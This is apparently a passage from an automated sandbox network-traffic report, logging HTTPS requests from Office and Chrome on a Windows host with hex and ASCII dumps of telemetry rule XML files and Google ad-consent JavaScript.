                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:40 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          105192.168.2.74986513.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:40 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:40 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 479
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582BB7D702D0"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: 5aec4ebb-b01e-0002-57ca-1a1b8f000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091240Z-17db6f7c8cfp6mfve0htepzbps00000005m0000000005b8w
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:40 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          106192.168.2.74987313.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:40 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:40 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 491
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582B98B88612"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: 9ba87e07-d01e-008e-2ae9-1a387a000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091240Z-17db6f7c8cfvq8pt2ak3arkg6n000000048g0000000013zy
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:40 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          107192.168.2.74986713.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:40 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:40 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 475
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: b2260943-f01e-0052-0b1c-1c9224000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091240Z-17db6f7c8cfcrfgzd01a8emnyg00000003tg000000000yhc
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:40 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          108192.168.2.749875142.250.185.1424432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:40 UTC825OUTGET /f/AGSKWxUmsMqtSSePcx4h11wfZV5rxyGVnJAk3oRbeOgKg7Io4obCBjjBWNKhsHkvPsx3lQdQWEDqC1eiMud2YT43HJ5HwRq_9qwIjdhbtz3yndJAe8FOk_FaXhRHtllCX0s7Nhk82CqRrQ==?fccs=W251bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLFsxNzI4ODk3MTU3LDYyNjAwMDAwMF0sbnVsbCxudWxsLG51bGwsW251bGwsWzddXSwiaHR0cHM6Ly9hbGQubXkuaWQvIixudWxsLFtbOCwidGFCZ0d2UlFDMjAiXSxbOSwiZW4tVVMiXSxbMTgsIltbWzBdXV0iXSxbMTksIjIiXSxbMTcsIlswXSJdXV0 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: fundingchoicesmessages.google.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC1930INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:40 GMT
                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorGlobalRouterHttp/cspreport
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-rYO99VQ0PKSv04b0wwny4w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorGlobalRouterHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorGlobalRouterHttp/cspreport/allowlist
                                                                                                                                                                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                                                                          reporting-endpoints: default="/_/ContributorGlobalRouterHttp/web-reports?context=eJzjamDU4pJicNKQYjhx6zbTBSA-73SH6ToQS3x9yaQFxE7pM1hDgLj15jnW6UCc9O88awkQu2tdZPUHYkOFS6zOQOxYdInVE4hVey6xmgPx_XWXWJ8D8dc9l1j_AvHej5dYjwJxkcQV1hYgvt10hfUxEAvxcHQc3LyDTWDHo-9HmJU0kvIL45Pz80qKMpNKS_KL0pLTUotTi8pSi-KNDIxMDA0MLPUMjOILDADL5U_t"
                                                                                                                                                                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC1930INData Raw: 32 38 32 38 0d 0a 69 66 20 28 74 79 70 65 6f 66 20 5f 5f 67 6f 6f 67 6c 65 66 63 2e 66 63 4b 65 72 6e 65 6c 4d 61 6e 61 67 65 72 2e 72 75 6e 20 3d 3d 3d 20 27 66 75 6e 63 74 69 6f 6e 27 29 20 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 3d 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 76 61 72 20 5a 6f 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 61 3d 5f 2e 71
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 2828if (typeof __googlefc.fcKernelManager.run === 'function') {"use strict";this.default_ContributorServingResponseClientJs=this.default_ContributorServingResponseClientJs||{};(function(_){var window=this;try{var Zo=function(a){if(!a)return null;a=_.q
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC1930INData Raw: 32 29 21 3d 6e 75 6c 6c 3f 5f 2e 4c 28 61 2c 32 29 3a 6e 75 6c 6c 29 26 26 0a 61 3d 3d 3d 31 26 26 5f 2e 4c 6e 28 63 2c 31 30 2c 21 30 29 3b 62 28 63 29 7d 3b 76 61 72 20 70 70 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 69 3d 5b 5d 7d 3b 70 70 2e 70 72 6f 74 6f 74 79 70 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 74 68 69 73 2e 69 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 61 2e 63 61 6c 6c 2e 61 70 70 6c 79 28 61 2c 5b 62 5d 2e 63 6f 6e 63 61 74 28 5f 2e 68 61 28 5f 2e 49 63 2e 61 70 70 6c 79 28 30 2c 61 72 67 75 6d 65 6e 74 73 29 29 29 29 7d 29 7d 3b 70 70 2e 70 72 6f 74 6f 74 79 70 65 2e 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 61 3d 5f 2e 49 63 2e 61 70 70 6c
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 2)!=null?_.L(a,2):null)&&a===1&&_.Ln(c,10,!0);b(c)};var pp=function(){this.i=[]};pp.prototype.addEventListener=function(a,b){this.i.push(function(){a.call.apply(a,[b].concat(_.ha(_.Ic.apply(0,arguments))))})};pp.prototype.g=function(){for(var a=_.Ic.appl
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC1930INData Raw: 66 75 6e 63 74 69 6f 6e 28 29 7b 74 70 28 61 2c 31 29 3b 62 70 28 62 29 7d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 70 28 61 2c 30 29 3b 62 70 28 62 29 7d 29 7d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 70 28 61 2c 32 29 7d 29 7d 3b 0a 76 61 72 20 56 70 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 62 2e 63 6c 61 73 73 4e 61 6d 65 3d 61 2e 6f 3b 62 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 70 78 22 3b 62 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 70 78 22 3b 62 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 61 62 73 6f 6c 75 74 65 22 3b 62 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 2d 31 30 30 30 30 70 78 22 3b 62 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 2d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: function(){tp(a,1);bp(b)},function(){tp(a,0);bp(b)})},function(){tp(a,2)})};var Vp=function(a){var b=document.createElement("div");b.className=a.o;b.style.width="1px";b.style.height="1px";b.style.position="absolute";b.style.left="-10000px";b.style.top="-
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC1930INData Raw: 6a 71 28 74 68 69 73 2e 6f 2c 74 68 69 73 2e 6a 29 2c 6b 71 28 74 68 69 73 2c 61 29 29 7d 3b 76 61 72 20 6b 71 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 6e 65 77 20 6f 70 28 61 2e 44 2c 61 2e 41 2c 61 2e 43 2c 61 2e 42 29 3b 45 70 28 61 2e 75 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 2e 73 74 61 72 74 28 65 2c 62 29 7d 29 3b 76 61 72 20 64 3d 69 71 28 61 29 3b 41 70 28 61 2e 75 2c 64 2e 69 63 29 3b 64 2e 4b 63 28 29 7d 3b 76 61 72 20 6c 71 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 6c 3d 5f 2e 75 28 61 29 7d 3b 5f 2e 79 28 6c 71 2c 5f 2e 4a 29 3b 76 61 72 20 6d 71 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 6c 3d 5f 2e 75 28 61 29 7d 3b 5f 2e 79 28 6d 71 2c 5f 2e 4a 29 3b 76 61 72 20 6e 71 3d 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: jq(this.o,this.j),kq(this,a))};var kq=function(a,b){var c=new op(a.D,a.A,a.C,a.B);Ep(a.u,function(e){c.start(e,b)});var d=iq(a);Ap(a.u,d.ic);d.Kc()};var lq=function(a){this.l=_.u(a)};_.y(lq,_.J);var mq=function(a){this.l=_.u(a)};_.y(mq,_.J);var nq=functio
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC1930INData Raw: 32 56 7a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 69 58 53 78 62 49 6d 46 6b 64 6a 4d 77 4d 43 30 79 4e 54 41 67 59 57 52 7a 4c 57 4a 73 62 32 4e 72 4c 58 42 68 62 6d 56 73 4c 58 52 70 63 47 38 74 4d 53 42 6b 5a 6e 41 74 63 47 78 31 5a 32 6c 75 4c 57 46 6b 64 6d 56 79 64 43 42 68 5a 43 31 77 64 58 4e 6f 5a 47 39 33 62 69 42 68 5a 43 31 6d 63 6d 46 74 5a 53 49 73 57 32 35 31 62 47 77 73 62 6e 56 73 62 43 78 75 64 57 78 73 4c 43 4a 6f 64 48 52 77 63 7a 6f 76 4c 33 42 68 5a 32 56 68 5a 44 49 75 5a 32 39 76 5a 32 78 6c 63 33 6c 75 5a 47 6c 6a 59 58 52 70 62 32 34 75 59 32 39 74 4c 33 42 68 5a 32 56 68 5a 43 39 71 63 79 39 73 61 57 52 68 63 69 35 71 63 7a 39 6d 59 32 52 63 64 54 41 77 4d 32 52 30 63 6e 56 6c 49 6c 30 73 57 32 35 31 62 47 77 73 62 6e 56 73
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 2VzLmdvb2dsZS5jb20iXSxbImFkdjMwMC0yNTAgYWRzLWJsb2NrLXBhbmVsLXRpcG8tMSBkZnAtcGx1Z2luLWFkdmVydCBhZC1wdXNoZG93biBhZC1mcmFtZSIsW251bGwsbnVsbCxudWxsLCJodHRwczovL3BhZ2VhZDIuZ29vZ2xlc3luZGljYXRpb24uY29tL3BhZ2VhZC9qcy9saWRhci5qcz9mY2RcdTAwM2R0cnVlIl0sW251bGwsbnVs
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC638INData Raw: 31 62 47 77 73 62 6e 56 73 62 43 77 69 61 48 52 30 63 48 4d 36 4c 79 39 6d 64 57 35 6b 61 57 35 6e 59 32 68 76 61 57 4e 6c 63 32 31 6c 63 33 4e 68 5a 32 56 7a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 76 58 79 39 44 62 32 35 30 63 6d 6c 69 64 58 52 76 63 6c 4e 6c 63 6e 5a 70 62 6d 64 58 5a 57 4a 54 64 32 6c 30 59 32 68 69 62 32 46 79 5a 45 68 30 64 48 41 76 61 6e 4e 6c 63 6e 4a 76 63 69 4a 64 58 56 30 5c 5c 75 30 30 33 64 5c 78 32 32 5c 78 35 64 5c 78 35 64 2c 5c 78 35 62 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5c 78 32 32 68 74 74 70 73 3a 5c 2f 5c 2f 66 75 6e 64 69 6e 67 63 68 6f 69 63 65 73 6d 65 73 73 61 67 65 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 5c 2f 66 5c 2f 41 47 53 4b 57 78 55 74 74 48 30 64 2d 5a 45 33 55 6b 50 4d 50 57 72 73 7a 73 57 61
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 1bGwsbnVsbCwiaHR0cHM6Ly9mdW5kaW5nY2hvaWNlc21lc3NhZ2VzLmdvb2dsZS5jb20vXy9Db250cmlidXRvclNlcnZpbmdXZWJTd2l0Y2hib2FyZEh0dHAvanNlcnJvciJdXV0\\u003d\x22\x5d\x5d,\x5bnull,null,null,\x22https:\/\/fundingchoicesmessages.google.com\/f\/AGSKWxUttH0d-ZE3UkPMPWrszsWa
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          109192.168.2.74987265.9.66.974432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:40 UTC364OUTGET /lt/c/16311/sync.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: tags.crwdcntrl.net
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/javascript
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 43601
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 20 Aug 2024 18:43:24 GMT
                                                                                                                                                                                                                                                                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
